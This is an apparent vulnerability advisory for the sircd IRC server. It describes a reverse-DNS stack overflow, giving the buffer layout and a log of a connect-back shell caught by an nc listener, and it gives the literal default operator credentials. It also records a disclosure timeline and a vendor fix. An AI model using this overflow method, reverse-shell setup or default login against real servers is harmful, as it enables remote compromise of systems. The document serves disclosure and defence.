I. BACKGROUND According to the vendor "The 'sircd' project started as an idea from the QuakeNet IRC Network coding team to develop a completely new irc server that had none of the problems of the original ircd, such as instability, scalability issues, redundant, badly written code and other nasty things. " More info is available at http://www.sircd.org. II. DESCRIPTION a: Insufficient bounds checking leads to execution of arbitrary code. b: Default oper account matching *!*@* III. ANALYSIS a: Upon checking the reverse dns of a connecting user, if the returned value is longer than a certain length a classic stack overflow occurs. The buffer may be constructed as such: [94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode], leaving us with plenty of space both before and after eip to store our shellcode. The accompanying .sh script is a silly proof of concept. Below is a fabricated copy of a typical run: [shell 1] $ nc -l -v -p 10000 listening on [any] 10000 ... [shell 2] # ./sircd.sh 127.0.0.1 sircd 0.4.0 proof-of-concept, usage ./sircd.sh UID check passed, backing up /etc/hosts Now connect to the sircd from 127.0.0.1 Press a key and enter to restore /etc/hosts asd Game over man, game over # [shell 3] $ sircd & [1] 75711 $ ===================================== sircd: v0.4.0 Alpha Author(s) Zarjazz (zarjazz@barrysworld.com) ===================================== sircd initialized SSL initialized $ BitchX 127.0.0.1 [snip some bitchx output] [fi] *** Welcome to the_server [fi] *** Resolving IP 127.0.0.1 --from here on the connection freezes. [shell 2] fah Game over man, game over # [shell 1] connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869 id uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user) b: type /oper bod bod bod in a connected irc-client. IV. DETECTION sircd-0.4.0 shipping with FreeBSD ports as per 03/02-03 is found to be vulnerable, as well as sircd-0.4.4 from CVS before 04/02-03. V. WORKAROUND The fix has been incorporated in the CVS tree as per 04/02-03. VI. VENDOR FIX Same as above. VII. CVE INFORMATION unknown VIII. DISCLOSURE TIMELINE 03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified. 04/02-02 zarjazz@barrysworld.com responded with a fix. 04/02-02 public disclosure. IX. CREDIT Knud Erik Højgaard